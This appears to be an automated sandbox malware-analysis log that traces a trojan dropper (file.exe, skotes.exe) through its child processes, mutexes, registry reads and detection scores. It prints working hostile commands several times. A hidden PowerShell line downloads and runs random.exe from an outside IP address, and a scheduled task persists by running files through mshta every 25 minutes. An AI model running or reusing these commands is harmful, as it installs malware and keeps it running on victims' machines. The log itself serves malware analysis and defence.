Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Code function: 56_2_000C779B	56_2_000C779B

Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Code function: String function: 000980C0 appears 130 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00F780C0 appears 130 times
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Code function: String function: 0040E5F0 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 008080C0 appears 260 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0080DF80 appears 36 times

Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\SysWOW64\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: D95Ju8g[1].exe.6.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: D95Ju8g.exe.6.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: VDoTjfk[1].exe.6.dr	Static PE information: Section: .bss ZLIB complexity 1.0003275810917722
Source: VDoTjfk.exe.6.dr	Static PE information: Section: .bss ZLIB complexity 1.0003275810917722

Source: VDoTjfk[1].exe.6.dr, Gq5hSfo2NxEmlo5Bpu.cs	Cryptographic APIs: 'CreateDecryptor'
Source: VDoTjfk[1].exe.6.dr, Gq5hSfo2NxEmlo5Bpu.cs	Cryptographic APIs: 'CreateDecryptor'
Source: VDoTjfk.exe.6.dr, Gq5hSfo2NxEmlo5Bpu.cs	Cryptographic APIs: 'CreateDecryptor'
Source: VDoTjfk.exe.6.dr, Gq5hSfo2NxEmlo5Bpu.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.phis.troj.spyw.evad.winEXE@186/98@15/4

Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe

Code function: 7_2_00402664 LoadResource,SizeofResource,FreeResource,

7_2_00402664

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:428:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6420:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2424:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6444:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8036:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5308:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5544:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4856:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:560:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7444:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6128:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2176:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6392:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:648:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5816:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7004:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2912:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\7A54.tmp\7A55.tmp\7A56.bat C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "nvidia.exe")

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe	Virustotal: Detection: 61%
Source: file.exe	ReversingLabs: Detection: 57%

Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 483d2fa8a0d53818306efeb32d3.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe "C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe"
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\7A54.tmp\7A55.tmp\7A56.bat C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe" any_word
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe any_word
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\7B1F.tmp\7B20.tmp\7B21.bat C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe any_word"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1032141021\am_no.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1032141021\am_no.cmd" any_word
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "C:\Temp\.hta"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta "C:\Temp\.hta"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /f
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c for %f in ("C:\Temp\*.gif") do (copy "%f" "C:\Temp\\random.hta" & start mshta "C:\Temp\\random.hta")
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "C:\Temp\\random.hta"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "C:\Temp\\random.hta"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe "C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\A6C3.tmp\A6C4.tmp\A6C5.bat C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe" any_word
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe any_word
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\A859.tmp\A85A.tmp\A85B.bat C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe any_word"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "C:\Temp\.hta"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1032141021\am_no.cmd" "
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1032141021\am_no.cmd" any_word
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "C:\Temp\.hta"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe "C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe"
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\E870.tmp\E871.tmp\E881.bat C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe" any_word
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe any_word
Source: C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\E9E7.tmp\E9E8.tmp\E9E9.bat C:\Users\user\AppData\Local\Temp\1031268001\1759c0aff4.exe any_word"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "C:\Temp\.hta"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1032141021\am_no.cmd" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1032141021\am_no.cmd" any_word
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "C:\Temp\.hta"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /f
